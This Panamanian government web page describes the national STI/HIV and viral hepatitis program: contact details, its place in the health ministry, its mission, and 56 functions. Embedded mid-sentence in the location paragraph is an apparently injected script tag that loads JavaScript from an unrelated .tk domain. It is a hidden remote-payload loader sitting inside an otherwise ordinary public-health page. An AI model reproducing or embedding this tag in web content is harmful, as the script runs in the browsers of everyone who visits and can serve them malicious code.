Gobierno Nacional de Panamá

Programa Nacional de ITS/VIH y Hepatitis Virales

Información de contacto

Teléfono:
Horario:8:00a.m.- 4:00p.m. Tel. 527-4944
Correo Electrónico:
pnvis.minsa@gmail.com Twitter: @PnivsPanama Facebook: PNIVS MINSA

Enlaces relacionados

Ubicación y dependencia jerárquica

El programa Nacional de ITS/VIH y Hepatitis Virales está ubicado en el departamento de Salud y atención integral a la población, el cual se encuentra en el Nivel Operativo Ejecutivo y depende jerárquicamente de la Sub Dirección General de Salud de la Población.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
Misión:
  1. Fortalecer el desarrollo y ejecución de políticas y programas de VIH a nivel nacional, favoreciendo el acceso a servicios de salud de calidad, proveyendo atención integral y prevención en población en general, con un enfoque primario en personas en más alto riesgo y vulnerabilidad al VIH
Funciones:
  1. Planificar, conducir y evaluar las acciones que realiza el Programa ITS/VIH/SIDA a nivel Nacional.
  2. Elaborar y recomendar la formulación de políticas, estrategias, programas, proyectos o legislaciones para mejorar el Programa ITS/VIH/SIDA.
  3. Identificar y gestionar los recursos económicos para financiar las diferentes acciones de promoción y prevención que a nivel nacional, realiza el Programa ITS/VIH/SIDA.
  4. Monitorear, supervisar y evaluar las acciones programadas por los demás componentes del Programa ITS/VIH/SIDA.
  5. Elaborar y divulgar los informes y análisis periódicos de la situación del Programa ITS/VIH/SIDA.
  6. Integrar todos los sectores de la sociedad en la prevención y atención de las ITS/VIH/SIDA, a través de coordinaciones intersectoriales.
  7. Solicitar a las entidades gubernamentales, asociaciones, gremios, grupos cívicos y otros, la asignación de sus representantes, para conformar y activar las comisiones, interinstitucionales e intersectoriales de trabajo.
  8. Promover la integración y coordinación entre las ONGs que realizan acciones en contra del VIH y SIDA.
  9. Coordinar con las entidades que según la ley, deben desarrollar un Plan Estratégico de prevención, control y manejo de las ITS/VIH/SIDA.
  10. Establecer un sistema de monitoreo y evaluación de todas las actividades que se realizan a nivel nacional sobre VIH/SIDA.
  11. Investigar y referir a las instancias correspondientes; las denuncias de personas portadoras o enfermas de ITS/VIH/SIDA, familiares o allegados de éstas y población general, que sean sometidas a cualquier discriminación o acto estigmatizador.
  12. Establecer convenios de cooperación con la CSS, MIDES, MEDUCA, MITRAB y otras entidades nacionales e internacionales, a fin de mejorar la atención de las personas afectadas por VIH/SIDA.
  13. Promover la creación de las clínicas de Tratamiento Antirretroviral en diferentes regiones de salud del país.
  14. Realizar diagnósticos periódicos de las necesidades de promoción y prevención en ITS/VIH/SIDA a nivel nacional.
  15. Producir material informativo, educativo sobre las ITS/VIH/SIDA, dirigido a la población en general.
  16. Mantener un inventario de las organizaciones que estén trabajando en VIH/SIDA y asegurar la participación de éstas en las acciones que se realicen.
  17. Apoyar a las entidades públicas, privadas, cívicas, sociales y religiosas en la información, comunicación y educación relacionada con el VIH/SIDA.
  18. Promover y mantener información oportuna sobre ITS/VIH/SIDA, a nivel nacional.
  19. Impulsar el desarrollo de investigaciones sobre Conocimientos Actitudes Practicas (CAP) con relación a las ITS/VIH/SIDA.
  20. Diseñar campañas de promoción y prevención en materia de ITS/VIH/SIDA, dirigidas a la población en general.
  21. Establecer alianzas con los medios de comunicación para la difusión de información sobre las ITS/VIH/SIDA.
  22. Promover el intercambio de información, conocimientos y experiencias entre los grupos beneficiados o que trabajan en la prevención de las ITS/VIH/SIDA.
  23. Velar por el cumplimiento a nivel nacional, de la atención integral a toda persona afectada por ITS/VIH/SIDA.
  24. Vigilar el cumplimiento de las medidas de bioseguridad para la protección del personal de salud a nivel nacional.
  25. Velar que se cumpla con lo establecido en la ley en materia de confidencialidad de las pruebas de VIH, a nivel nacional.
  26. Coordinar con el Ministerio de Gobierno y Justicia el desarrollo de los programas de manejo de las ITS/VIH/SIDA para los internos y egresados del sistema penitenciario.
  27. Asegurar el acceso de los privados de libertad a la atención integral de salud.
  28. Identificar necesidades de ampliar servicios de salud para la atención de PVVIH/SIDA.
  29. Desarrollar los mecanismos necesarios, a fin de asegurar el abastecimiento oportuno de los medicamentos Antirretrovirales, incluyendo la adherencia al tratamiento.
  30. Monitorear, supervisar y evaluar las acciones de atención que se realizan en todas las regiones de salud del país.
  31. Identificar las necesidades de investigación y capacitación relacionadas a la atención de salud con relación a las ITS/VIH/SIDA.
  32. Monitorear y supervisar el cumplimiento de las normas de atención integral, con relación a las ITS/VIH/SIDA.
  33. Revisar y actualizar periódicamente las normas de atención integral con relación a las ITS/VIH/SIDA.
  34. Gestionar los recursos necesarios, para la atención integral de las PVVIH/SIDA.
  35. Garantizar la provisión de los recursos necesarios, para el tratamiento adecuado y oportuno, de las personas que hayan tenido exposición laboral al VIH.
  36. Supervisar a nivel nacional el cumplimiento de lo establecido en la norma de PVVIH/SID, en materia de seguimiento a las personas que hayan tenido exposición laboral al VIH.
  37. Coordinar con la Dirección de Provisión de Servicios de Salud, el suministro oportuno, de los medicamentos que serán utilizados para el tratamiento de las ITS/VIH/SIDA.
  38. Asegurar a nivel nacional, la cobertura con prueba de VDRL y VIH a todas las embarazadas del país.
  39. Asegurar el tratamiento para reducir la transmisión vertical del VIH y la sífilis congénita.
  40. Vigilar a nivel nacional las situaciones en que se estén violando los derechos humanos de las personas con VIH/SIDA y dar seguimiento para su solución.
  41. Desarrollar actividades de capacitación para el personal de salud en la atención integral de las ITS/VIH/SIDA.
  42. Promover a nivel nacional el desarrollo voluntario de la prueba de detección del VIH previa consejería.
  43. Coordinar y participar a nivel nacional con el equipo de Laboratorio y Banco de Sangre, en la actualización de las normas de calidad y manejo de los bancos de productos humanos y sus derivados.
  44. Participar en conjunto con el equipo de Laboratorio y Banco de Sangre, en las actividades de control de calidad los bancos de productos humanos.
  45. Velar en conjunto con el equipo de Laboratorio y Banco de Sangre en el cumplimiento de los procedimientos y la utilización de los instrumentos estandarizados por el MINSA para restringir la donación de productos de personas que pueden haberse expuesto a ITS o al VIH.
  46. Coordinar con la Dirección de Provisión de Servicios de Salud el suministro a nivel regional, de donaciones recibidas de organismos nacionales e internacionales de las pruebas diagnósticas de VIH según normas establecidas.
  47. Capacitar y actualizar al recurso humano de salud, en el diagnóstico, confirmación y monitoreo de las ITS/VIH/SIDA.
  48. Promover la incorporación de otros laboratorios a la red de acuerdo a su nivel de complejidad.
  49. Mantener comunicación y coordinación con los demás componentes del Programa e instancias públicas y privadas para asegurar el uso de la información que se genera a través de la vigilancia.
  50. Diseñar, implementar y actualizar, a nivel nacional el sistema de información, que permitan obtener los datos para conocer la situación de las ITS/VIH/SIDA, con participación de los otros componentes del Programa.
  51. Participar en la coordinación con los demás usuarios de la información, de los indicadores que serán monitoreados por el Sistema de Vigilancia Epidemiológica de las ITS/VIH/SIDA.
  52. Participar en la actualización las normas de vigilancia epidemiológica de las ITS/VIH/SIDA.
  53. Definir en coordinación con los demás componentes del Programa, las líneas de investigación en materia de ITS/VIHSIDA.
  54. Priorizar las necesidades de investigación en materia de ITS/VIH/SIDA.
  55. Gestionar mecanismos y espacios para divulgar los resultados de las investigaciones realizadas.
  56. Identificar posibles fuentes de financiamiento para realizar investigaciones en ITS/VIH/SIDA.